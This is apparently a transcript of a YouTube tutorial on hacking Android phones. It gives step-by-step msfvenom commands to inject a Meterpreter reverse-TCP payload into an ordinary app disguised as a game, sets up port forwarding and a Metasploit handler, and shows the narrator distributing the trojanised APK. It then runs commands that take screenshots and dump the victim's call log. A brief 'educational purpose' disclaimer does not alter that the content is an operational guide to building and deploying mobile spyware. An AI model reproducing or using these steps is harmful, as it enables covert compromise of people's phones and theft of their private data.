This video is only for educational purpose. If you did anything illegal, only you will be responsible for it. Hello guys, welcome to my YouTube channel. In today's video, we will learn how to hack any Android mobile. You all have seen many videos on YouTube in which they just create the payload. But in today's video, we will learn how to inject payload in an application. So without wasting your time, let's start the video. But before it, please subscribe to the channel and please like the video. And the aim of like is 100. So here is our app. You can use any app, whatever you want. Now open the terminal and log in into the root. Now type cd desktop. Now open the Chrome browser and go to the portmap.io site. There are a lot of tutorials on YouTube. You can watch them to how to make account on portmap.io website. So we need this. Just copy it. We are using it as IP address. Now just type msf venom -x. Now here the app name and -p android /meterpreter /reverse _ tcp lhost equal to sign, and now here you need to type this address. So just paste it. Now lport. Now in lport you need to use this port 49016. In your case it may be differ. Now -o, and now you can use any name like game.apk. Just press enter. So if we forget to use sudo, so just add sudo in starting. And now just press enter. And it will take some time, and it also depends on the application size. So be patient and don't be panic. Now it is completed, and here is our application. So it is on the desktop. So here it is. So I am sending it by Google Drive. You can use any mode, whatever you want. Meanwhile, please subscribe my channel, and that is the most important thing. Now just click on the first. Now we need to download this configuration file, and now just click on download and open the terminal. Open another tab. Now see the directory where the downloaded file is saved. So here it is. So log in into the root. We are going to use OpenVPN. So just type OpenVPN -config in the file name and just press enter. Now this process is completed. So open another tab and now type msf console. It will take some time, and you just need to wait. Now type use multi-slash handler. Now type set payload Android slash meterpreter slash reverse underscore TCP. Now type set lhost to lhost. Press enter. Now set the L port. Now here you need to set the port that is in the port map. So just click on the edit button, and now here it is port on your PC 80, so just type 80 and now type exploit. So it is failed to validate lhost, so we just replace the lhost. So type set lhost, and now here we need to type this address which we have used in while creating the payload. So just paste it and now press enter. Now type run. You can type exploit also. Now I am going to install it on my phone. Type install anyway. Press open. Now I am going to play one game. Sorry for that, my bad. So you can see the session is opened. So just to know the commands, just type help. Now you can see all the commands that you can use. There are a lot of commands, and now we are going to get the system info. So just type sysinfo. So here it is, Android version. Now we are going to grab a screenshot, so just type screenshot. So the screenshot is saved at this location. Now we are going to check another command, ifconfig. So here you can get the IPv6 address, hardware MAC. So you can do many things with this if you have the proper knowledge. So now we are going to get the call details. So we are going to use this command, dump underscore call log. So just press enter. Now the call log is saved. So you can open this file and get the call logs. So that's all for today. I hope you liked it very much, and if you have any issues you can comment down, and please don't forget to subscribe, and our like aim is 100, so please do that, and thank you so much.